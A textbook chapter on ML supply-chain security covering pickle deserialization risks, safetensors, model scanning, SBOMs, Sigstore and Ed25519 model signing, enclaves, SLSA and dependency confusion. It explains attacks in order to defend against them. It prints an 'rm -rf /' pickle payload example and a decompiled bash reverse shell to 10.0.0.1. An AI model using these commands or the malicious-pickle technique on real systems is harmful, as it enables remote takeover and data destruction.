Chapter 31.4: DevSecOps & Supply Chain Security

“An ML model is just a binary blob that executes matrix multiplication. Or so we thought, until someone put a reverse shell in the weights file.”

31.4.1. The Model Supply Chain Crisis

In modern MLOps, we rarely train from scratch. We download bert-base from Hugging Face, resnet from TorchVision, and docker images from Docker Hub. This is a Supply Chain. And it is currently wide open.

The Attack Surface

  1. Direct Dependency: The pip install tensorflow package.
  2. Model Dependency: The model.pth file.
  3. Data Dependency: The S3 bucket with training JPEGs.
  4. Container Dependency: The FROM python:3.9 base image.

31.4.2. The Pickle Vulnerability (Arbitrary Code Execution)

Python’s pickle module is the standard serialization format for PyTorch (torch.save), Scikit-Learn (joblib), and Pandas. It is insecure by design.

How Pickle Works

Pickle is a stack-based virtual machine: a pickle file is a program made of opcodes that the loader executes. One of those opcodes is REDUCE, which calls any callable with arguments.

  • Normal: REDUCE(torch.Tensor, [1,2,3]) -> Creates a tensor.
  • Evil: REDUCE(os.system, ["rm -rf /"]) -> Deletes your server.
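The mechanics are easy to demonstrate with the stdlib alone. The sketch below builds a pickle whose "reconstruction" step calls an attacker-chosen callable; `str.upper` stands in for `os.system` so the demo is safe to run:

```python
import io
import pickle
import pickletools

class Exploit:
    # __reduce__ tells pickle how to "reconstruct" this object.
    # An attacker returns any callable plus its arguments; we use
    # the harmless str.upper in place of os.system.
    def __reduce__(self):
        return (str.upper, ("payload ran at load time",))

payload = pickle.dumps(Exploit())

# Disassembling (which does NOT execute the pickle) reveals the
# REDUCE opcode that will trigger the call on load.
trace = io.StringIO()
pickletools.dis(payload, out=trace)
assert "REDUCE" in trace.getvalue()

# Merely unpickling executes the callable -- no inference required.
result = pickle.loads(payload)
print(result)  # the callable's return value, not an Exploit object
```

Swapping `str.upper` for `os.system` and the string for a shell command is the entire exploit.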

The Exploit

Hugging Face hosts >500k models. Anyone can upload a .bin or .pth file. If you load a model from a stranger:

import torch
model = torch.load("downloaded_model.pth") # BOOM! Hacker owns your shell.

This happens instantly upon load. You don’t even need to run inference.

The Solution: Safetensors

Safetensors (developed by Hugging Face) is a format designed to be safe, fast, and zero-copy.

  • Safe: It purely stores tensors and JSON metadata. No executable code.
  • Fast: Uses memory mapping (mmap) for instant loading.

Rule: Block all .pkl, .pth, .bin files from untrusted sources. Only allow .safetensors or ONNX.
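To see why the format is safe by construction, here is a minimal stdlib-only sketch of the safetensors file layout: an 8-byte little-endian header length, a JSON header mapping tensor names to dtype/shape/offsets, then raw tensor bytes. This is a didactic re-implementation, not the official library; use `safetensors` itself in production.

```python
import json
import struct

def write_safetensors(path, tensors):
    """Write tensors in the safetensors layout.

    tensors: {name: (dtype_str, shape_list, raw_bytes)}
    The file contains only a length, JSON metadata, and raw bytes --
    no opcodes, no callables, nothing to execute at load time.
    """
    header, blobs, offset = {}, [], 0
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {
            "dtype": dtype,
            "shape": shape,
            "data_offsets": [offset, offset + len(raw)],
        }
        blobs.append(raw)
        offset += len(raw)
    encoded = json.dumps(header).encode("utf-8")
    with open(path, "wb") as f:
        f.write(struct.pack("<Q", len(encoded)))  # 8-byte header size
        f.write(encoded)
        for blob in blobs:
            f.write(blob)

def read_header(path):
    """Read only the JSON header, never the tensor bytes.

    This separation is what makes lazy, mmap-based loading possible.
    """
    with open(path, "rb") as f:
        (size,) = struct.unpack("<Q", f.read(8))
        return json.loads(f.read(size))
```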


31.4.3. Scanning your Supply Chain

Just as we scan code for bugs, we must scan models and datasets for threats.

1. ModelScan

A tool to scan model files (PyTorch, TensorFlow, Keras, Sklearn) for known unsafe operators.

pip install modelscan

# Scan a directory
modelscan -p ./downloaded_models

# Output:
# CRITICAL: Found unsafe operator 'os.system' in model.pkl

2. Gitleaks (Secrets in Notebooks)

Data Scientists love Jupyter Notebooks. They also love hardcoding AWS keys in them.

  • Problem: Notebooks are JSON. Plaintext scanners often miss secrets inside the "source": [] blocks.
  • Solution: Use nbconvert to strip output before committing, and run gitleaks in CI.
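Because a notebook is just JSON, stripping outputs before commit is a few lines of code. A minimal pre-commit sketch (the key names are the standard nbformat ones):

```python
import json

def strip_notebook(nb_json: str) -> str:
    """Remove outputs and execution counts from a Jupyter notebook.

    Leaked keys often hide in cell outputs (stack traces, printed
    env vars), so clearing them before commit shrinks the surface
    that gitleaks has to cover.
    """
    nb = json.loads(nb_json)
    for cell in nb.get("cells", []):
        if cell.get("cell_type") == "code":
            cell["outputs"] = []
            cell["execution_count"] = None
    return json.dumps(nb, indent=1)
```

The nbconvert equivalent is `jupyter nbconvert --clear-output --inplace notebook.ipynb`, run as a pre-commit hook.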

3. CVE Scanning (Trivy)

ML Docker images are huge (5GB+) and full of vulnerabilities (old CUDA drivers, system libs).

trivy image pytorch/pytorch:2.0.1-cuda11.7-cudnn8-runtime

# Output: 500 Vulnerabilities (20 Critical).

Mitigation: Use Distroless images or “Wolfi” (Chainguard) images for ML containers to reduce surface area.


31.4.4. SBOM for AI (Software Bill of Materials)

An SBOM is a list of ingredients. For AI, we need an AI-SBOM (or MLBOM).

The CycloneDX Standard

CycloneDX v1.5 added support for ML Models. It tracks:

  1. Model Metadata: Name, version, author.
  2. Dataset Ref: Hash of the training set.
  3. Hyperparameters: Learning rate, epochs.
  4. Hardware: “Trained on H100”.
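For orientation, here is roughly what such a component looks like in CycloneDX 1.5 JSON. This is a hand-written fragment; the field names follow the published schema, but the values are invented, so check the spec before relying on exact shapes:

```json
{
  "type": "machine-learning-model",
  "name": "fin-bert-v2",
  "version": "2.1.0",
  "modelCard": {
    "modelParameters": {
      "task": "text-classification",
      "architectureFamily": "BERT"
    }
  }
}
```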

Generating an SBOM

Tools like syft can generate SBOMs for containers/directories.

syft dir:. -o cyclonedx-json > sbom.json

Why it matters

When the next “Log4Shell”-class vulnerability hits a specific version of numpy or transformers, you can query your SBOM database: “Show me every model in production that was trained using numpy==1.20.”
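That query is trivial once the SBOMs exist. A sketch of the incident-response drill, scanning a set of CycloneDX JSON files for a vulnerable pin (file paths and the function name are illustrative):

```python
import json

def affected_models(sbom_paths, package, version):
    """Return the SBOM files whose component list pins package==version.

    Each SBOM corresponds to one model/container build, so a hit means
    that artifact was built with the vulnerable dependency.
    """
    hits = []
    for path in sbom_paths:
        with open(path) as f:
            sbom = json.load(f)
        for comp in sbom.get("components", []):
            if comp.get("name") == package and comp.get("version") == version:
                hits.append(path)
                break
    return hits
```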


31.4.5. Model Signing (Sigstore)

How do you know model.safetensors was actually produced by your CI/CD pipeline and not swapped by a hacker?

Signing.

Sigstore / Cosign

Sigstore allows “Keyless Signing” using OIDC identity (e.g., GitHub Actions identity).

Signing (in CI):

# Authenticate via OIDC
cosign sign-blob --oidc-issuer https://token.actions.githubusercontent.com \
  ./model.safetensors

Verifying (in Inference Server):

cosign verify-blob \
  --certificate-identity "https://github.com/myorg/repo/.github/workflows/train.yml" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  ./model.safetensors

If the signature doesn’t match, the model server refuses to load.
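A minimal fail-closed gate an inference server might run before any `torch.load` or safetensors read. It shells out to the same `cosign verify-blob` invocation shown above; the binary path is parameterized here so the gate can be exercised without cosign installed (in production, cosign must be on the PATH):

```python
import subprocess

def verify_before_load(model_path, identity, issuer, cosign_bin="cosign"):
    """Refuse to proceed unless the model's Sigstore signature verifies."""
    cmd = [
        cosign_bin, "verify-blob",
        "--certificate-identity", identity,
        "--certificate-oidc-issuer", issuer,
        model_path,
    ]
    result = subprocess.run(cmd, capture_output=True, text=True)
    if result.returncode != 0:
        # Fail closed: an unverifiable model is never loaded.
        raise RuntimeError(f"signature verification failed: {result.stderr.strip()}")
    return True
```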


31.4.6. Confidential Computing (AWS Nitro Enclaves)

For high-security use cases (Healthcare, Finance), protecting the data in use (in RAM) is required. Usually, the Cloud Provider (AWS/GCP) technically has root access to the hypervisor and could dump your RAM.

Confidential Computing encrypts the RAM. The CPU (AMD EPYC with SEV-SNP, or Intel with SGX/TDX) holds the keys. Even AWS cannot see the memory.

Architecture: Nitro Enclaves

  1. Parent Instance: A standard EC2 instance. Runs the web server.
  2. Enclave: A hardened, isolated VM with NO network, NO storage, and NO ssh. It only talks to the Parent via a local socket (VSOCK).
  3. Attestation: The Enclave proves to the client (via cryptographic proof signed by AWS KMS) that it is running the exact code expected.

Use Case: Private Inference

  • User: Sends encrypted genome data.
  • Enclave: Decrypts data inside the enclave, runs model inference, encrypts prediction.
  • Result: The Admin of the EC2 instance never sees the genome data.

31.4.7. Zero Trust ML Architecture

Combining it all into a holistic “Zero Trust” strategy.

  1. Identity: Every model, service, and user has an SPIFFE ID. No IP-based allowlists.
  2. Least Privilege: The Training Job has write access to s3://weights, but read-only to s3://data. The Inference Service has read-only to s3://weights.
  3. Validation:
    • Input: Validate shapes, types, and value ranges.
    • Model: Validate Signatures (Sigstore) and Scan Status (ModelScan).
    • Output: Validate PII and Confidence (Uncertainty Estimation).
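The “Input” leg of that triad can be sketched in a few lines. A deny-by-default request validator for a fixed-length feature vector (the length and value bounds are illustrative):

```python
def validate_input(vec, expected_len, lo=-1.0, hi=1.0):
    """Reject malformed inference requests before they reach the model.

    Checks shape (length), type (numeric, bool excluded), and value
    range. Anything that fails raises; nothing is silently coerced.
    """
    if not isinstance(vec, (list, tuple)) or len(vec) != expected_len:
        raise ValueError(f"expected a vector of {expected_len} features")
    for i, v in enumerate(vec):
        # bool is a subclass of int, so exclude it explicitly
        if isinstance(v, bool) or not isinstance(v, (int, float)):
            raise TypeError(f"feature {i} is not numeric")
        if not (lo <= v <= hi):
            raise ValueError(f"feature {i}={v} outside [{lo}, {hi}]")
    return True
```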

31.4.9. Deep Dive: Supply-chain Levels for Software Artifacts (SLSA)

Google’s SLSA (pronounced “salsa”) framework is the gold standard for supply chain integrity. We adapt it for ML.

SLSA Levels for ML

  1. Level 1 (Scripted Build): You have a train.py script. You aren’t just manually running commands in a notebook.
  2. Level 2 (Version Control): The code and config are in Git. The build runs in a CI system (GitHub Actions).
  3. Level 3 (Verified History): The CI system produces a signed provenance attestation: “I, GitHub Actions run #55, produced this model.safetensors.”
  4. Level 4 (Two-Person Review + Hermetic): All code changes are reviewed. The build is hermetic (no internet access during training, preventing downloads of unpinned deps).

Implementing SLSA Level 3

Use the slsa-github-generator action.

uses: slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@v1.4.0
with:
  base64-subjects: "${{ hash_of_model }}"
  upload-assets: true

31.4.10. Air-Gapped & Private Deployments

For Banks and Defense, “Security” means “No Internet.”

The Pattern: VPC Endpoints

You never want your inference server to have 0.0.0.0/0 outbound access.

  • Problem: How do you download the model from S3 or talk to Bedrock?
  • Solution: AWS PrivateLink (VPC Endpoints).
    • Creates a local network interface (ENI) in your subnet that routes to S3/Bedrock internally on the AWS backbone.
    • No NAT Gateway required. No Internet Gateway required.

PyPI Mirroring

You cannot run pip install tensorflow in an air-gapped environment.

  • Solution: Run a private PyPI mirror (Artifactory / AWS CodeArtifact).
  • Process: Security team scans packages -> Pushes to Private PyPI -> Training jobs pull from Private PyPI.

31.4.11. Tool Spotlight: Fickling

We mentioned modelscan. Fickling is a more aggressive tool that can reverse-engineer Pickle files to find the injected code.

Decompiling a Pickle

Pickle is a stack-based language. Fickling decompiles it into human-readable Python code.

fickling --decompile potentially_evil_model.pth

# Output:
# import os
# os.system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')

This serves as forensic evidence during an incident response.
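A crude, stdlib-only approximation of what modelscan and fickling look for: disassemble the pickle with pickletools, which inspects opcodes without ever executing them, and flag references into dangerous modules. A sketch for illustration, not a substitute for the real tools:

```python
import pickletools

# Modules whose callables should never appear inside a model file.
DANGEROUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins", "sys"}

def unsafe_imports(payload: bytes):
    """List GLOBAL / STACK_GLOBAL references into dangerous modules.

    GLOBAL (older protocols) carries 'module name' as its argument.
    STACK_GLOBAL (protocol 4+) takes both strings from the stack,
    so we track pushed unicode strings as a rough stand-in.
    """
    found, pushed = [], []
    for op, arg, _pos in pickletools.genops(payload):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            pushed.append(arg)
        elif op.name == "GLOBAL":
            if arg.split()[0] in DANGEROUS_MODULES:
                found.append(arg)
        elif op.name == "STACK_GLOBAL" and len(pushed) >= 2:
            module, name = pushed[-2], pushed[-1]
            if module in DANGEROUS_MODULES:
                found.append(f"{module} {name}")
    return found
```

Anything this flags warrants a full fickling decompile before the file is allowed anywhere near `torch.load`.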


31.4.12. Zero Trust Data Access

Security isn’t just about the code; it’s about the Data.

OPA (Open Policy Agent) for Data

Use OPA to enforce matching between User Clearance and Data Classification.

package data_access

default allow = false

# Allow if user clearance level >= data sensitivity level
allow {
    user_clearance := input.user.attributes.clearance_level
    data_sensitivity := input.data.classification.level
    user_clearance >= data_sensitivity
}

Purpose-Based Access Control

“Why does this model need this data?”

  • Training: Needs bulk access.
  • Inference: Needs single-record access.
  • Analyst: Needs aggregated/anonymized access.
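The mapping above is a policy table, and enforcing it is a deny-by-default lookup. A tiny sketch (purpose names and access shapes mirror the list; identifiers are illustrative):

```python
# Map each declared purpose to the access shapes it justifies.
PURPOSE_POLICY = {
    "training":  {"bulk"},
    "inference": {"single-record"},
    "analyst":   {"aggregate"},
}

def authorize(purpose: str, requested: str) -> bool:
    """Deny by default: unknown purposes and mismatched shapes fail."""
    return requested in PURPOSE_POLICY.get(purpose, set())
```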

31.4.14. Deep Dive: Model Cards for Security

Security is about Transparency. A Model Card (Mitchell et al.) documents the safety boundaries of the model.

Key Security Sections

  1. Intended Use: “This model is for poetic generation. NOT for medical advice.”
  2. Out-of-Scope Use: “Do not use for credit scoring.”
  3. Training Data: “Trained on Public Crawl 2023 (Potential Toxicity).”
  4. Limitations: “Hallucinates facts about events post-2022.”

Automating Model Cards

Use the huggingface_hub Python library to programmatically generate cards in CI.

from huggingface_hub import ModelCard, ModelCardData

card_data = ModelCardData(
    language='en',
    license='mit',
    model_name='fin-bert-v2',
    finetuned_from='bert-base-uncased',
    tags=['security-audited', 'slsa-level-3']
)

card = ModelCard.from_template(
    card_data,
    template_path="security_template.md"
)
card.save('README.md')

31.4.15. Private Model Registries (Harbor / Artifactory)

Don’t let your servers pull from huggingface.co directly.

  • Risk: Hugging Face could go down, or the model author could delete/update the file (Mutable tags).
  • Solution: Proxy everything through an OCI-compliant registry.

Architecture

  1. Curator: Security Engineer approves bert-base.
  2. Proxy: dronerepo.corp.com caches bert-base.
  3. Training Job: FROM dronerepo.corp.com/bert-base.

Harbor Config (OCI)

Harbor v2.0+ supports OCI artifacts. You can push models as Docker layers.

# Push Model to OCI Registry
oras push myregistry.com/models/bert:v1 \
  --artifact-type application/vnd.model.package \
  ./model.safetensors

This treats the model exactly like a Docker image (immutable, signed, scanned).


31.4.16. War Story: The PyTorch Dependency Confusion

“We installed pytorch-helpers and got hacked.”

The Attack

  • Concept: Dependency Confusion (Alex Birsan).
  • Setup: Company X uses an internal package called pytorch-helpers hosted on their private PyPI.
  • Attack: Hacker registers pytorch-helpers on the public PyPI with a massive version number (v99.9.9).
  • Execution: When pip install pytorch-helpers runs in CI, pip (by default) looks at both Public and Private repos and picks the highest version. It downloaded the hacker’s v99 package.

Not just Python

This attacks NPM, RubyGems, and Nuget too.

The Fix

  1. Namespace Scoping: Use scoped packages (@company/helpers).
  2. Strict Indexing: Configure pip so internal names resolve only from the private repo. --extra-index-url is dangerous because it merges both indexes and picks the highest version; prefer a single index-url pointing at a proxying private mirror.
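The corresponding pip configuration is short. The hostname below is invented; point it at your own mirror, which in turn proxies and pins approved public packages:

```ini
# /etc/pip.conf -- resolve ONLY from the internal mirror.
[global]
index-url = https://pypi.internal.example.com/simple
# Deliberately no extra-index-url: merging indexes re-opens
# the dependency-confusion hole.
```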

31.4.17. Interview Questions

Q1: What is a “Hermetic Build” in MLOps?

  • Answer: A build process where the network is disabled (except for a specific, verified list of inputs). It guarantees that if I run the build today and next year, I get bit-for-bit identical results. Standard pip install is NOT hermetic because deps change.

Q2: Why is Model Signing separate from Container Signing?

  • Answer: Containers change rarely (monthly). Models change frequently (daily/hourly). Signing them separately allows you to re-train the model without rebuilding the heavy CUDA container.

31.4.19. Appendix: Production Model Signing Tool (Python)

Below is a complete implementation of a CLI tool to Sign and Verify machine learning models using Asymmetric Cryptography (Ed25519). This is the foundation of a Level 3 SLSA build.

import argparse
import os
import sys
import hashlib
from cryptography.hazmat.primitives.asymmetric import ed25519
from cryptography.hazmat.primitives import serialization

class ModelSigner:

    def generate_keys(self, base_path: str):
        """Generates Ed25519 private/public keypair"""
        private_key = ed25519.Ed25519PrivateKey.generate()
        public_key = private_key.public_key()

        # Save Private Key (In production, this stays in Vault/KMS)
        with open(f"{base_path}.priv.pem", "wb") as f:
            f.write(private_key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.PKCS8,
                encryption_algorithm=serialization.NoEncryption()
            ))

        # Save Public Key
        with open(f"{base_path}.pub.pem", "wb") as f:
            f.write(public_key.public_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PublicFormat.SubjectPublicKeyInfo
            ))
        
        print(f"Keys generated at {base_path}.priv.pem and {base_path}.pub.pem")

    def sign_model(self, model_path: str, key_path: str):
        """Signs the SHA256 hash of a model file"""
        # 1. Load Key
        with open(key_path, "rb") as f:
            private_key = serialization.load_pem_private_key(
                f.read(), password=None
            )

        # 2. Hash Model (Streaming for large files)
        sha256 = hashlib.sha256()
        with open(model_path, "rb") as f:
            while chunk := f.read(8192):
                sha256.update(chunk)
        digest = sha256.digest()

        # 3. Sign
        signature = private_key.sign(digest)

        # 4. Save Signature
        sig_path = f"{model_path}.sig"
        with open(sig_path, "wb") as f:
            f.write(signature)
        
        print(f"Model signed. Signature at {sig_path}")

    def verify_model(self, model_path: str, key_path: str, sig_path: str):
        """Verifies integrity and authenticity"""
        # 1. Load Key
        with open(key_path, "rb") as f:
            public_key = serialization.load_pem_public_key(f.read())

        # 2. Load Signature
        with open(sig_path, "rb") as f:
            signature = f.read()

        # 3. Hash Model
        sha256 = hashlib.sha256()
        try:
            with open(model_path, "rb") as f:
                while chunk := f.read(8192):
                    sha256.update(chunk)
            digest = sha256.digest()
        except FileNotFoundError:
            print("Model file not found.")
            sys.exit(1)

        # 4. Verify
        try:
            public_key.verify(signature, digest)
            print("SUCCESS: Model signature is VALID. The file is authentic.")
        except Exception:
            print("CRITICAL: Model signature is INVALID! Do not load this file.")
            sys.exit(1)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ML Model Signing Tool")
    subparsers = parser.add_subparsers(dest="command")

    gen = subparsers.add_parser("keygen", help="Generate keys")
    gen.add_argument("--name", required=True)

    sign = subparsers.add_parser("sign", help="Sign a model")
    sign.add_argument("--model", required=True)
    sign.add_argument("--key", required=True)

    verify = subparsers.add_parser("verify", help="Verify a model")
    verify.add_argument("--model", required=True)
    verify.add_argument("--key", required=True)
    verify.add_argument("--sig", required=True)

    args = parser.parse_args()
    signer = ModelSigner()

    if args.command == "keygen":
        signer.generate_keys(args.name)
    elif args.command == "sign":
        signer.sign_model(args.model, args.key)
    elif args.command == "verify":
        signer.verify_model(args.model, args.key, args.sig)

31.4.20. Appendix: Simple SBOM Generator

A script to generate a CycloneDX-style JSON inventory of the current Python environment.

import datetime
import json
import socket
import uuid

import pkg_resources  # note: deprecated upstream; importlib.metadata is the modern replacement

def generate_sbom():
    installed_packages = pkg_resources.working_set
    sbom = {
        "bomFormat": "CycloneDX",
        "specVersion": "1.4",
        "serialNumber": f"urn:uuid:{uuid.uuid4()}",
        "version": 1,
        "metadata": {
            "timestamp": datetime.datetime.now(datetime.timezone.utc).isoformat(),
            "tools": [{
                "vendor": "MLOps Book",
                "name": "SimpleSBOM",
                "version": "1.0.0"
            }],
            "component": {
                "type": "container",
                "name": socket.gethostname()
            }
        },
        "components": []
    }

    for package in installed_packages:
        component = {
            "type": "library",
            "name": package.project_name,
            "version": package.version,
            "purl": f"pkg:pypi/{package.project_name}@{package.version}",
            "description": "Python Package"
        }
        sbom["components"].append(component)

    return sbom

if __name__ == "__main__":
    import uuid
    print(json.dumps(generate_sbom(), indent=2))

31.4.21. Summary

DevSecOps is about shifting security left.

  1. Don’t Pickle: Use Safetensors.
  2. Scan Everything: Scan models and containers in CI.
  3. Sign Artifacts: Use Sigstore to guarantee provenance.
  4. Isolate: Run high-risk parsing (like PDF parsing) in sandboxes/enclaves.
  5. Inventory: Maintain an SBOM so you know what you are running.
  6. Air-Gap: If it doesn’t need the internet, cut the cable.
  7. Private Registry: Treating models as OCI artifacts is the future of distribution.
  8. Tooling: Use the provided ModelSigner to implement model signing today.